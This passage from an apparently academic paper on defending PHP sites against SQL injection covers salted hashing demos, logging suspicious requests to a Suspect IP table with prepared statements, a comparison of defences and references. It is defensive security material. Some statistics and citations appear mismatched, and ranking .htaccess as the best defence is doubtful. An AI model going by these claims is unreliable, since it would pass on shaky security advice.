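$md5Rows = array_map('fixed_salt_md5', $users);      // what the fixed-salt scheme stores
$kdfRows = array_map('pbkdf2_store', $users);        // what the per-account scheme stores

printf("fixed salt : admin and guest rows identical? %s\n",
    var_export($md5Rows['admin'] === $md5Rows['guest'], true));
printf("random salt: admin and guest rows identical? %s\n",
    var_export($kdfRows['admin'] === $kdfRows['guest'], true));
printf("correct password accepted? %s\n",
    var_export(pbkdf2_check('123456', $kdfRows['admin']), true));
printf("wrong password accepted?   %s\n",
    var_export(pbkdf2_check('12345', $kdfRows['admin']), true));

// PHP's built-in API does the same bookkeeping (random salt, cost, format) for bcrypt.
$bcrypt = password_hash('123456', PASSWORD_BCRYPT, ['cost' => 12]);
printf("bcrypt verify: %s\n", var_export(password_verify('123456', $bcrypt), true));
```

With a fixed salt, one precomputed table built for that salt covers every account at once; with a per-account salt the work has to be repeated for each row, and the iteration count makes each guess expensive.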

10. Logging. With the growth of data and the need of individuals to collect and classify it, the threats aimed at destroying information systems are increasing. In modern computing and computer systems, the most reliable way of learning about threats is to search and study all of the system's activities at the host and server level and at the network level, and to find the logical links between them. The most important thing in preventing these types of attacks is to separate untrusted data from commands and queries. Logs contain highly critical information about all events related to applications, services, and operating systems. Nearly all of today's systems and applications are able to create and collect logs of their own activities. Web servers always record all their operations in a log file. It soon became apparent that these log files, which can be read by an application, can provide data about the popularity of a website, and so log file analysis software appeared. The first commercial log analyzer was built in 1994 by IPRO. [23]

Logs are used to identify security threats and to become aware of changes. The information recorded in the log helps the programmer to troubleshoot errors. In fact, without studying the logs there is no way to fix many errors. In many cases, the only way to keep track of security problems and threats is to monitor the operating system logs continuously and without interruption. [24]

Recent studies have shown that over 70 percent of security breaches have come through an internal agent in the organization, while the use of firewalls and intrusion detection systems only helps to increase security against attacks from outside the organization.

The only way to identify internal threats is to monitor integrated operating system logs. For example, as described in the section on the 404 page, a 404 page or similar functions placed on some web pages can be used to detect incorrect or unauthorized access to a web page. The IP address of the person (intruder) is captured so that the person in charge can block him. One of the best ways to identify him is to use a table in the database called Suspect, in which the address is stored as in the pseudo-code below, and then to apply the admin policies, for example after 10 repeated accesses to the site. [25]

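// $link is an open mysqli connection (assumed to be created earlier)
$stmt = mysqli_prepare($link, "SELECT * FROM logs WHERE id = ? AND titr = ?");
mysqli_stmt_bind_param($stmt, "ss", $_GET['id'], $_GET['titr']);
mysqli_stmt_execute($stmt);
mysqli_stmt_store_result($stmt);
$num = mysqli_stmt_num_rows($stmt);
if ($num == 0) {
    // No matching row: record the requester's IP in the Suspect table
    $ip = $_SERVER['REMOTE_ADDR'];
    $ins = mysqli_prepare($link, "INSERT INTO Suspect (ipaddr) VALUES (?)");
    mysqli_stmt_bind_param($ins, "s", $ip);
    mysqli_stmt_execute($ins);
    header('Location: /404.php');
    exit;
}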

With the attacker's IP stored, there is at least one log of the unauthorized activity on the website. [26]
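One way to combine the Suspect table with the "after 10 repeated accesses" admin policy described above, using parameterized queries throughout, is sketched in the following added example, which is not code from the original paper. It assumes the PDO SQLite driver so that it runs offline; the table columns, function names, IP addresses and sample requests are constructed for illustration.

```php
<?php
// Added illustration; schema details, function names and requests are assumptions.
const BLOCK_THRESHOLD = 10;            // the "after 10 times" admin policy

function open_demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE logs (id INTEGER, titr TEXT)');
    $db->exec('CREATE TABLE Suspect (ipaddr TEXT PRIMARY KEY, hits INTEGER, last_seen TEXT)');
    $db->exec("INSERT INTO logs (id, titr) VALUES (1, 'news')");
    return $db;
}

function suspect_hits(PDO $db, string $ip): int
{
    $q = $db->prepare('SELECT hits FROM Suspect WHERE ipaddr = ?');
    $q->execute([$ip]);
    return (int) $q->fetchColumn();    // an unknown address has no row and counts as 0
}

function record_suspect(PDO $db, string $ip): void
{
    $now = gmdate('c');
    $upd = $db->prepare('UPDATE Suspect SET hits = hits + 1, last_seen = ? WHERE ipaddr = ?');
    $upd->execute([$now, $ip]);
    if ($upd->rowCount() === 0) {      // first miss from this address
        $ins = $db->prepare('INSERT INTO Suspect (ipaddr, hits, last_seen) VALUES (?, 1, ?)');
        $ins->execute([$ip, $now]);
    }
}

// Returns 'blocked', '404' or 'ok' instead of sending headers, so it runs from the CLI.
function handle_request(PDO $db, string $ip, array $get): string
{
    if (suspect_hits($db, $ip) >= BLOCK_THRESHOLD) {
        return 'blocked';
    }
    // User input is bound as data and never concatenated into the SQL text.
    $q = $db->prepare('SELECT COUNT(*) FROM logs WHERE id = ? AND titr = ?');
    $q->execute([(string) ($get['id'] ?? ''), (string) ($get['titr'] ?? '')]);
    if ((int) $q->fetchColumn() === 0) {
        record_suspect($db, $ip);
        return '404';
    }
    return 'ok';
}

$db = open_demo_db();
echo handle_request($db, '198.51.100.20', ['id' => '1', 'titr' => 'news']), "\n";
for ($i = 1; $i <= 11; $i++) {         // constructed malformed request: stray quote in id
    echo $i, ': ', handle_request($db, '203.0.113.7', ['id' => "1'", 'titr' => 'news']), "\n";
}
echo 'hits recorded: ', suspect_hits($db, '203.0.113.7'), "\n";
```

REMOTE_ADDR is the address of the directly connected peer, so behind a reverse proxy or NAT one entry in Suspect may stand for a proxy or for many users, and a block based on it can also hit legitimate visitors.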

Discussion:

According to statistics from the Alert Logic Institute, up to 55% of cybercrime attacks against web-based systems are carried out via the SQL Injection method. [27] This paper introduced the reader to methods for detecting vulnerabilities by examining HTML code and by using scanners and the HTML headers to become aware of bugs in Web sites. Then, after familiarity with a variety of SQL Injection attacks, general approaches to blocking penetration were introduced, such as lowering user access levels, encoding important information in the database, and recording user activity in the database; after that, the work done on checking the correctness of variables, the use of stored procedures and parameterized variables was analyzed. Then, methods were presented to close off the attacker's options, such as using the 404 page, using .HTACCESS and storing the data as hashes in the database, and, as a result, an algorithm for logging unauthorized activity and trapping the attacker.

Also, according to the tests carried out using the software called carrot, each of the methods for preventing SQL Injection discussed in this article helps the programmer to create a dead end for the attacker's penetration attempts.

The best method was the use of the rules included in .HTACCESS, which acted as a solid barrier against Dork to prevent intrusion.

Conclusion:

[Figure: pie chart "Method to Prevent SQL Injection": htaccess 45%, 404 page 37%, hashing code 14%, other 4%]

[Figure: Multi-Agent SQL Injection Diagram. Inputs: User Name / Password (Query Check) and Address Bar. Agent 1: HTACCESS Configuration; Agent 2: Hashing and Salt; Agent 3: 404 Trap; Agent 4: Logging and Tracking]

This article has attempted to introduce the reader to the concept of SQL Injection and to discuss the various methods attackers use in this way to attack and threaten a website.

Comparison of the agents in single-agent mode:

| Agent | Source Code Adjustment | Attack Detection | Attack Prevention | Negatives |
|---|---|---|---|---|
| HTAccess | Not needed | Does not detect | Removes the address of the PHP files | Cannot prevent attacks through forms |
| Hashing and Salt | Needed | Does not detect | If the attack succeeds, it displays encrypted information that lacks credibility | It only encrypts and does not, on its own, report the attack |
| 404 Trap | Needed | Detects | In case of an attack, the request is handed over to the reporting process | It has to be directed to this page by another agent |
| Logging and Tracking | Needed | Detects | After the redirect from the broken link, it stores the attack in the database and records the IP | Possible mis-logging if the database is missing |

Also, by implementing the code in the PHP language, we have attempted to turn penetration in practice into a dead end and to bring the reader to a level of knowledge at which, with a brief review of what has been discussed, he can secure his website against such risks.

It is hoped that the topics discussed will be of some small help in improving programmers' level of security.

To extend this work, this paper proposes:

1- Follow specific steps to roll out the .HTACCESS file, and add new algorithms and techniques to improve its performance.

2- Because the dead ends in this article are addressed exclusively to the CMS, the security of the hosting environment can be dealt with as a lower layer.

REFERENCES

[1] A. Tajpour, S. Ibrahim and M. Masrom, “SQL injection Prevention and detection Techniques,” International Journal of Advancements in Computing Technology, vol. 3, no. 7, pp. 85-91, August 2011.
[2] The Open Web Application Security Project, “OWASP Top ten project,” https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project.
[3] A. Ciampa, C. A. Visaggio and M. D. Penta, “A heuristic-based approach for detecting SQL-injection vulnerabilities in web applications,” in Proceedings of the 2010 ICSE Workshop on Software Engineering for Secure Systems, SESS '10, New York, 2010.
[4] Behzad Moradi / Sokan Academy / Whats the Sql Injection In PHP
[5] Advanced SQL Injection (Defcon 17) by Joseph Mccray
[6] Abas Hoseini / World of SQLi
[7] SQL Injection Attack and Defence by Justin Clarke.
[8] K. Amirathimasebi, S. Jalalinia and S. Khadem, “A Survey of sql injection defence mechanisms,” in International Conference Internet Technology and Secured Transactions ICITST 2009, 2009.
[9] The Web Application Hacker’s Handbook by Dafydd Stuttard and Marcus Pinto
[10] Z. Jan, M. Shah, A. Rauf, M. Khan and S. Mahfooz, “Access control mechanism for web databases by using parameterized cursor,” in Future Information Technology (FutureTech), 2010 5th International Conference, 2010.
[11] R. Dharam and S. G. Shiva, “A framework for development of runtime monitors,” in Proceedings of the International Conference on Computer & Information Science (ICCIS), Kuala Lumpur, 2012, pp. 953-957.
[12] Xiang Fu and K. Qian, “SAFELI – SQL Injection Scanner Using Symbolic Execution,” in Workshop on Testing, Analysis and Verification of Web Software, July 21, 2008.
[13] A. Moosa, “Artificial Neural Network based Web Application Firewall for SQL Injection,” World Academy of Science, Engineering and Technology, vol. 40, pp. 42-51, April 2010.
[14] Z. Lijiu, Q. Gu, S. Peng and X. Chen, “D-WAV A Web Application Vulnerabilities Detection Tool Using Characteristics of Web Forms,” in Fifth International Conference on Software Engineering Advances (ICSEA), 2010, Nice, 2010.
[15] Proper / Web Developer Island / Whats The .Htaccess and How to Working
[16] Hamideh Ardalan-Ali Naser Asadi / The 4th National Conference on the Application of New Technologies in Engineering Sciences / Hash Function in Crypto
[17] M. Ruse, T. Sarkar, and S. Basu, “Analysis & detection of SQL injection vulnerabilities via automatic test case generation of programs,” in Proceedings of the 10th IEEE/IPSJ International Symposium on Applications and the Internet (SAINT), Seoul, Korea, 2010, pp. 31-37.
[18] Dr. Manju Kaushik, Gazal Ojha, “SQL Injection Attack Detection and Prevention Methods: A Critical Review,” International Journal of Innovative Research in Science, Engineering and Technology.
[19] A. Ciampa, C. A. Visaggio and M. D. Penta, “A heuristic-based approach for detecting sql-injection vulnerabilities in web applications,” in Proceedings of the 2010 ICSE Workshop on Software Engineering for Secure Systems, SESS '10, New York, NY, USA, 2010.
[20] D. A. Anup Shakya, “A Taxonomy of SQL Injection Defense Techniques,” Karlskrona Sweden, 2011.
[21] C. T. M and B. J., “Design considerations for a honeypot for sql injection attacks,” in LCN '09, 2009.
[22] M. Cova, D. Balzarotti, V. Felmetsger and G. Vigna, “Swaddler: An Approach for the Anomaly-based Detection of State Violations in Web Applications,” 12 December 2013. [Online]. Available: http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.127.6909.
[23] S. Gordeychik, 15 December 2013. [Online]. [Accessed December 2013].
[24] A. Kieyzun, P. J. Guo and K. Jayaraman, “Ernst. Automatic creation of sql injection and cross-site scripting attacks,” in 31st International Conference on Software Engineering, ICSE '09, Washington, 2009.
[25] ITNA / Integrated logic monitoring of the operating system, one of the requirements of the IT department of the organization
[26] B. Damele A. G. and S. Miroslav, “http://sqlmap.org/,” 12 June 2016. [Online]. Available: http://sqlmap.org/. [Accessed 13 June 2017].
[27] J. N., C. Kruegel and E. K., “Pixy: a static analysis tool for detecting Web application vulnerabilities,” Security and Privacy, 2006 IEEE Symposium on, pp. 41-46, 2006.